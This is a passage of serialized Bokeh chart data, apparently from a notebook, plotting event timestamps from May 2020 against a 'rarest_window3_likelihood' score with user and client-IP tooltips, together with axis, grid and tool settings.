21:16:58+00:00\",\"2020-05-28 13:32:38+00:00\",\"2020-05-28 13:37:36+00:00\",\"2020-05-28 13:42:08+00:00\",\"2020-05-28 13:46:29+00:00\",\"2020-05-28 13:51:42+00:00\",\"2020-05-28 13:59:05+00:00\",\"2020-05-28 14:03:09+00:00\",\"2020-05-28 14:06:47+00:00\",\"2020-05-28 14:11:34+00:00\",\"2020-05-28 14:16:38+00:00\",\"2020-05-28 14:22:42+00:00\",\"2020-05-28 14:26:57+00:00\",\"2020-05-28 15:32:16+00:00\",\"2020-05-28 15:37:43+00:00\",\"2020-05-28 15:41:52+00:00\",\"2020-05-28 15:46:42+00:00\",\"2020-05-28 15:51:45+00:00\",\"2020-05-28 15:58:17+00:00\",\"2020-05-28 16:02:18+00:00\",\"2020-05-28 16:07:15+00:00\",\"2020-05-28 16:12:19+00:00\",\"2020-05-28 16:17:26+00:00\",\"2020-05-28 16:22:05+00:00\",\"2020-05-28 16:27:14+00:00\",\"2020-05-28 10:32:28+00:00\",\"2020-05-28 10:37:15+00:00\",\"2020-05-28 10:42:42+00:00\",\"2020-05-28 10:47:18+00:00\",\"2020-05-28 10:52:56+00:00\",\"2020-05-28 10:57:20+00:00\",\"2020-05-28 11:05:34+00:00\",\"2020-05-28 11:07:39+00:00\",\"2020-05-28 11:12:26+00:00\",\"2020-05-28 11:17:35+00:00\",\"2020-05-28 11:23:07+00:00\",\"2020-05-28 08:32:20+00:00\",\"2020-05-28 08:37:22+00:00\",\"2020-05-28 08:43:29+00:00\",\"2020-05-28 08:48:22+00:00\",\"2020-05-28 08:52:19+00:00\",\"2020-05-28 08:57:09+00:00\",\"2020-05-28 09:02:33+00:00\",\"2020-05-28 09:07:31+00:00\",\"2020-05-28 09:13:21+00:00\",\"2020-05-28 09:17:45+00:00\",\"2020-05-28 09:22:33+00:00\",\"2020-05-28 09:33:09+00:00\",\"2020-05-28 09:37:57+00:00\",\"2020-05-28 09:42:28+00:00\",\"2020-05-28 09:47:21+00:00\",\"2020-05-28 09:52:17+00:00\",\"2020-05-28 09:57:19+00:00\",\"2020-05-28 10:02:26+00:00\",\"2020-05-28 10:07:24+00:00\",\"2020-05-28 10:13:04+00:00\",\"2020-05-28 10:17:38+00:00\",\"2020-05-28 10:22:46+00:00\",\"2020-05-28 03:26:38+00:00\",\"2020-05-28 03:31:41+00:00\",\"2020-05-28 03:37:25+00:00\",\"2020-05-28 03:41:52+00:00\",\"2020-05-28 03:46:42+00:00\",\"2020-05-28 03:51:39+00:00\",\"2020-05-28 03:56:48+00:00\",\"2020-05-28 04:01:36+00:00\",\"2020-05-28 04:07:14+00:00\",\"2020-05-28 04:12:07+00:00\",\"2020-05-28 04:16:55+00:00\",\"2020-05-28 17:32:23+00:00\",\"2020-05-28 17:37:07+00:00\",\"2020-05-27 17:56:58+00:00\",\"2020-05-27 18:01:43+00:00\",\"2020-05-27 18:06:58+00:00\",\"2020-05-27 18:12:11+00:00\",\"2020-05-27 18:17:00+00:00\",\"2020-05-28 12:32:11+00:00\",\"2020-05-28 12:36:26+00:00\",\"2020-05-28 12:42:38+00:00\",\"2020-05-28 12:46:26+00:00\",\"2020-05-28 12:51:55+00:00\",\"2020-05-28 12:57:08+00:00\",\"2020-05-28 13:03:45+00:00\",\"2020-05-28 13:07:59+00:00\",\"2020-05-28 13:12:07+00:00\",\"2020-05-28 13:16:41+00:00\",\"2020-05-28 13:21:33+00:00\",\"2020-05-28 16:32:00+00:00\",\"2020-05-28 16:36:55+00:00\",\"2020-05-28 16:44:17+00:00\",\"2020-05-28 16:47:16+00:00\",\"2020-05-28 16:51:52+00:00\",\"2020-05-28 16:56:50+00:00\",\"2020-05-28 17:02:02+00:00\",\"2020-05-28 17:08:49+00:00\",\"2020-05-28 17:12:51+00:00\",\"2020-05-28 17:17:06+00:00\",\"2020-05-28 17:22:00+00:00\",\"2020-05-28 17:26:47+00:00\",\"2020-05-28 06:26:57+00:00\",\"2020-05-28 05:27:19+00:00\",\"2020-05-28 05:32:11+00:00\",\"2020-05-28 05:37:10+00:00\",\"2020-05-28 05:41:51+00:00\",\"2020-05-28 05:46:54+00:00\",\"2020-05-28 05:52:04+00:00\",\"2020-05-28 05:57:38+00:00\",\"2020-05-28 06:01:57+00:00\",\"2020-05-28 06:06:55+00:00\",\"2020-05-28 06:11:46+00:00\",\"2020-05-28 06:16:47+00:00\",\"2020-05-27 22:07:06+00:00\",\"2020-05-27 22:12:15+00:00\",\"2020-05-27 22:22:35+00:00\",\"2020-05-27 22:52:24+00:00\",\"2020-05-27 22:17:24+00:00\",\"2020-05-27 22:27:44+00:00\",\"2020-05-27 22:02:59+00:00\",\"2020-05-27 22:32:54+00:00\",\"2020-05-27 22:37:11+00:00\",\"2020-05-27 22:42:40+00:00\",\"2020-05-27 22:47:04+00:00\",\"2020-05-28 15:07:11+00:00\",\"2020-05-28 15:12:37+00:00\",\"2020-05-28 15:17:00+00:00\",\"2020-05-28 15:22:27+00:00\",\"2020-05-28 15:27:57+00:00\",\"2020-05-28 15:32:17+00:00\",\"2020-05-28 15:37:41+00:00\",\"2020-05-28 15:42:05+00:00\",\"2020-05-28 15:47:29+00:00\",\"2020-05-28 15:02:48+00:00\",\"2020-05-28 15:53:05+00:00\",\"2020-05-27 18:02:20+00:00\",\"2020-05-27 18:07:51+00:00\",\"2020-05-27 18:12:12+00:00\",\"2020-05-27 18:22:03+00:00\",\"2020-05-27 18:37:15+00:00\",\"2020-05-27 18:17:45+00:00\",\"2020-05-27 18:32:52+00:00\",\"2020-05-27 18:52:31+00:00\",\"2020-05-27 18:27:24+00:00\",\"2020-05-27 18:42:37+00:00\",\"2020-05-27 18:47:01+00:00\",\"2020-05-28 03:02:30+00:00\",\"2020-05-28 03:07:43+00:00\",\"2020-05-28 03:18:00+00:00\",\"2020-05-28 03:27:18+00:00\",\"2020-05-28 03:42:49+00:00\",\"2020-05-28 03:52:01+00:00\",\"2020-05-28 03:12:49+00:00\",\"2020-05-28 03:22:08+00:00\",\"2020-05-28 03:32:27+00:00\",\"2020-05-28 03:37:41+00:00\",\"2020-05-28 03:47:57+00:00\",\"2020-05-28 16:18:01+00:00\",\"2020-05-28 16:32:35+00:00\",\"2020-05-28 16:42:55+00:00\",\"2020-05-28 16:02:42+00:00\",\"2020-05-28 16:22:11+00:00\",\"2020-05-28 16:27:20+00:00\",\"2020-05-28 16:37:42+00:00\",\"2020-05-28 16:47:13+00:00\",\"2020-05-28 16:52:11+00:00\",\"2020-05-28 16:07:06+00:00\",\"2020-05-28 16:12:33+00:00\",\"2020-05-27 19:27:28+00:00\",\"2020-05-27 19:37:14+00:00\",\"2020-05-27 19:42:32+00:00\",\"2020-05-27 19:07:57+00:00\",\"2020-05-27 19:21:59+00:00\",\"2020-05-27 19:52:13+00:00\",\"2020-05-27 19:02:24+00:00\",\"2020-05-27 19:12:16+00:00\",\"2020-05-27 19:17:41+00:00\",\"2020-05-27 19:33:00+00:00\",\"2020-05-27 19:47:52+00:00\",\"2020-05-28 08:22:28+00:00\",\"2020-05-28 08:27:40+00:00\",\"2020-05-28 08:38:00+00:00\",\"2020-05-28 08:47:30+00:00\",\"2020-05-28 08:02:12+00:00\",\"2020-05-28 08:07:28+00:00\",\"2020-05-28 08:12:55+00:00\",\"2020-05-28 08:17:28+00:00\",\"2020-05-28 08:32:52+00:00\",\"2020-05-28 08:42:13+00:00\",\"2020-05-28 08:52:48+00:00\",\"2020-05-28 05:03:00+00:00\",\"2020-05-28 05:37:52+00:00\",\"2020-05-28 05:42:04+00:00\",\"2020-05-28 05:52:37+00:00\",\"2020-05-28 05:07:19+00:00\",\"2020-05-28 05:17:55+00:00\",\"2020-05-28 05:22:09+00:00\",\"2020-05-28 05:47:32+00:00\",\"2020-05-28 05:12:39+00:00\",\"2020-05-28 05:27:29+00:00\",\"2020-05-28 05:32:36+00:00\",\"2020-05-28 08:58:00+00:00\",\"2020-05-28 10:07:32+00:00\",\"2020-05-28 10:12:47+00:00\",\"2020-05-28 10:23:07+00:00\",\"2020-05-28 10:37:24+00:00\",\"2020-05-28 10:42:36+00:00\",\"2020-05-28 10:47:50+00:00\",\"2020-05-28 10:02:24+00:00\",\"2020-05-28 10:17:55+00:00\",\"2020-05-28 10:52:57+00:00\",\"2020-05-28 10:27:08+00:00\",\"2020-05-28 10:32:16+00:00\",\"2020-05-28 07:07:21+00:00\",\"2020-05-28 07:12:51+00:00\",\"2020-05-28 07:32:31+00:00\",\"2020-05-28 07:47:23+00:00\",\"2020-05-28 07:02:54+00:00\",\"2020-05-28 07:17:08+00:00\",\"2020-05-28 07:22:36+00:00\",\"2020-05-28 07:27:02+00:00\",\"2020-05-28 07:37:46+00:00\",\"2020-05-28 07:42:02+00:00\",\"2020-05-28 07:52:40+00:00\",\"2020-05-28 11:02:12+00:00\",\"2020-05-28 11:27:58+00:00\",\"2020-05-28 11:52:56+00:00\",\"2020-05-28 11:07:18+00:00\",\"2020-05-28 11:37:22+00:00\",\"2020-05-28 11:12:30+00:00\",\"2020-05-28 11:17:41+00:00\",\"2020-05-28 11:22:50+00:00\",\"2020-05-28 11:32:08+00:00\",\"2020-05-28 11:42:36+00:00\",\"2020-05-28 11:47:44+00:00\",\"2020-05-27 23:57:56+00:00\",\"2020-05-28 00:07:27+00:00\",\"2020-05-28 00:22:15+00:00\",\"2020-05-28 00:37:18+00:00\",\"2020-05-28 00:52:10+00:00\",\"2020-05-28 00:02:10+00:00\",\"2020-05-28 00:17:03+00:00\",\"2020-05-28 00:27:41+00:00\",\"2020-05-28 00:47:53+00:00\",\"2020-05-28 00:12:50+00:00\",\"2020-05-28 00:33:04+00:00\",\"2020-05-28 00:42:27+00:00\",\"2020-05-28 09:02:32+00:00\",\"2020-05-28 09:12:51+00:00\",\"2020-05-28 09:32:39+00:00\",\"2020-05-28 09:18:12+00:00\",\"2020-05-28 09:22:13+00:00\",\"2020-05-28 09:37:43+00:00\",\"2020-05-28 09:42:53+00:00\",\"2020-05-28 09:52:06+00:00\",\"2020-05-28 09:07:39+00:00\",\"2020-05-28 09:27:26+00:00\",\"2020-05-28 09:47:01+00:00\",\"2020-05-28 17:17:55+00:00\",\"2020-05-28 17:22:20+00:00\",\"2020-05-28 17:32:13+00:00\",\"2020-05-28 17:37:41+00:00\",\"2020-05-28 17:02:48+00:00\",\"2020-05-28 17:07:08+00:00\",\"2020-05-28 17:12:32+00:00\",\"2020-05-28 17:27:47+00:00\",\"2020-05-28 04:02:45+00:00\",\"2020-05-28 04:07:55+00:00\",\"2020-05-28 04:17:11+00:00\",\"2020-05-28 04:27:38+00:00\",\"2020-05-28 04:32:53+00:00\",\"2020-05-28 04:37:10+00:00\",\"2020-05-28 04:42:35+00:00\",\"2020-05-28 04:52:12+00:00\",\"2020-05-28 04:12:02+00:00\",\"2020-05-28 04:22:29+00:00\",\"2020-05-28 04:47:55+00:00\",\"2020-05-28 12:23:01+00:00\",\"2020-05-28 12:02:14+00:00\",\"2020-05-28 12:12:35+00:00\",\"2020-05-28 12:27:08+00:00\",\"2020-05-28 12:43:00+00:00\",\"2020-05-28 12:07:22+00:00\",\"2020-05-28 12:17:46+00:00\",\"2020-05-28 12:32:24+00:00\",\"2020-05-28 12:37:33+00:00\",\"2020-05-28 12:47:25+00:00\",\"2020-05-28 12:52:49+00:00\",\"2020-05-27 23:02:15+00:00\",\"2020-05-27 23:07:38+00:00\",\"2020-05-27 23:12:06+00:00\",\"2020-05-27 23:17:15+00:00\",\"2020-05-27 23:27:03+00:00\",\"2020-05-27 23:32:11+00:00\",\"2020-05-27 23:37:20+00:00\",\"2020-05-27 23:42:33+00:00\",\"2020-05-27 23:52:31+00:00\",\"2020-05-27 23:22:52+00:00\",\"2020-05-27 23:47:04+00:00\",\"2020-05-28 01:17:19+00:00\",\"2020-05-28 01:27:07+00:00\",\"2020-05-28 01:32:24+00:00\",\"2020-05-28 01:47:13+00:00\",\"2020-05-28 01:02:00+00:00\",\"2020-05-28 01:37:46+00:00\",\"2020-05-28 01:42:04+00:00\",\"2020-05-28 01:52:20+00:00\",\"2020-05-28 01:07:28+00:00\",\"2020-05-28 01:13:04+00:00\",\"2020-05-28 01:22:50+00:00\",\"2020-05-28 13:18:00+00:00\",\"2020-05-28 13:52:57+00:00\",\"2020-05-28 13:07:04+00:00\",\"2020-05-28 13:12:34+00:00\",\"2020-05-28 13:37:36+00:00\",\"2020-05-28 13:02:52+00:00\",\"2020-05-28 13:22:21+00:00\",\"2020-05-28 13:27:52+00:00\",\"2020-05-28 13:32:11+00:00\",\"2020-05-28 13:42:05+00:00\",\"2020-05-28 13:47:29+00:00\",\"2020-05-28 06:12:28+00:00\",\"2020-05-28 06:17:58+00:00\",\"2020-05-28 06:27:48+00:00\",\"2020-05-28 06:52:02+00:00\",\"2020-05-28 06:03:01+00:00\",\"2020-05-28 06:07:09+00:00\",\"2020-05-28 06:37:13+00:00\",\"2020-05-28 06:22:16+00:00\",\"2020-05-28 06:32:57+00:00\",\"2020-05-28 06:42:24+00:00\",\"2020-05-28 06:47:48+00:00\",\"2020-05-28 14:02:46+00:00\",\"2020-05-28 14:12:37+00:00\",\"2020-05-28 14:37:35+00:00\",\"2020-05-28 14:07:13+00:00\",\"2020-05-28 14:17:06+00:00\",\"2020-05-28 14:42:01+00:00\",\"2020-05-28 14:47:28+00:00\",\"2020-05-28 14:22:30+00:00\",\"2020-05-28 14:27:52+00:00\",\"2020-05-28 14:32:12+00:00\",\"2020-05-28 14:53:05+00:00\",\"2020-05-27 20:02:01+00:00\",\"2020-05-27 20:42:28+00:00\",\"2020-05-27 20:47:37+00:00\",\"2020-05-27 20:07:18+00:00\",\"2020-05-27 20:17:42+00:00\",\"2020-05-27 20:32:09+00:00\",\"2020-05-27 20:37:19+00:00\",\"2020-05-27 20:52:47+00:00\",\"2020-05-27 20:12:34+00:00\",\"2020-05-27 20:22:54+00:00\",\"2020-05-27 20:27:02+00:00\",\"2020-05-27 21:02:01+00:00\",\"2020-05-27 21:07:11+00:00\",\"2020-05-27 21:17:35+00:00\",\"2020-05-27 21:47:35+00:00\",\"2020-05-27 21:52:39+00:00\",\"2020-05-27 21:12:27+00:00\",\"2020-05-27 21:22:46+00:00\",\"2020-05-27 21:32:06+00:00\",\"2020-05-27 21:37:16+00:00\",\"2020-05-27 21:42:24+00:00\",\"2020-05-27 21:27:57+00:00\",\"2020-05-28 02:02:42+00:00\",\"2020-05-28 02:07:51+00:00\",\"2020-05-28 02:27:27+00:00\",\"2020-05-28 02:32:36+00:00\",\"2020-05-28 02:47:01+00:00\",\"2020-05-28 02:52:17+00:00\",\"2020-05-28 02:13:03+00:00\",\"2020-05-28 02:17:09+00:00\",\"2020-05-28 02:22:19+00:00\",\"2020-05-28 02:37:44+00:00\",\"2020-05-28 02:42:57+00:00\"],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"2067\"},\"selection_policy\":{\"id\":\"2068\"}},\"id\":\"2012\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"2060\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1987\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"2027\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"2066\",\"type\":\"YearsTicker\"},{\"attributes\":{},\"id\":\"2025\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1994\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"2082\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1983\",\"type\":\"DataRange1d\"},{\"attributes\":{\"axis\":{\"id\":\"2029\"},\"ticker\":null},\"id\":\"2032\",\"type\":\"Grid\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"2062\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"2010\"},\"ticker\":{\"id\":\"1990\"}},\"id\":\"1989\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"2064\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"2083\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1985\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"2053\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"2055\"},{\"id\":\"2056\"},{\"id\":\"2057\"},{\"id\":\"2058\"},{\"id\":\"2059\"},{\"id\":\"2060\"},{\"id\":\"2061\"},{\"id\":\"2062\"},{\"id\":\"2063\"},{\"id\":\"2064\"},{\"id\":\"2065\"},{\"id\":\"2066\"}]},\"id\":\"1990\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"2063\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"axis_label\":\"rarest_window3_likelihood\",\"formatter\":{\"id\":\"2053\"},\"ticker\":{\"id\":\"1994\"}},\"id\":\"1993\",\"type\":\"LinearAxis\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"Tooltip\":\"printf\"},\"tooltips\":[[\"rarest_window3_likelihood\",\"@rarest_window3_likelihood\"],[\"UserId\",\"@UserId\"],[\"rarest_window3\",\"@rarest_window3\"],[\"ClientIP\",\"@ClientIP\"],[\"time_col\",\"@time_col\"]]},\"id\":\"1977\",\"type\":\"HoverTool\"},{\"attributes\":{\"axis\":{\"id\":\"1989\"},\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1992\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2067\",\"type\":\"Selection\"},{\"attributes\":{\"axis\":{\"id\":\"1993\"},\"dimension\":1,\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1996\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2068\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"overlay\":{\"id\":\"2002\"}},\"id\":\"1998\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1997\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"2000\",\"type\":\"SaveTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"blue\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"begin\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2040\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"1999\",\"type\":\"ResetTool\"},{\"attributes\":{\"fill_color\":{\"value\":\"blue\"},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"begin\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2039\",\"type\":\"Circle\"},{\"attributes\":{\"dimensions\":\"width\"},\"id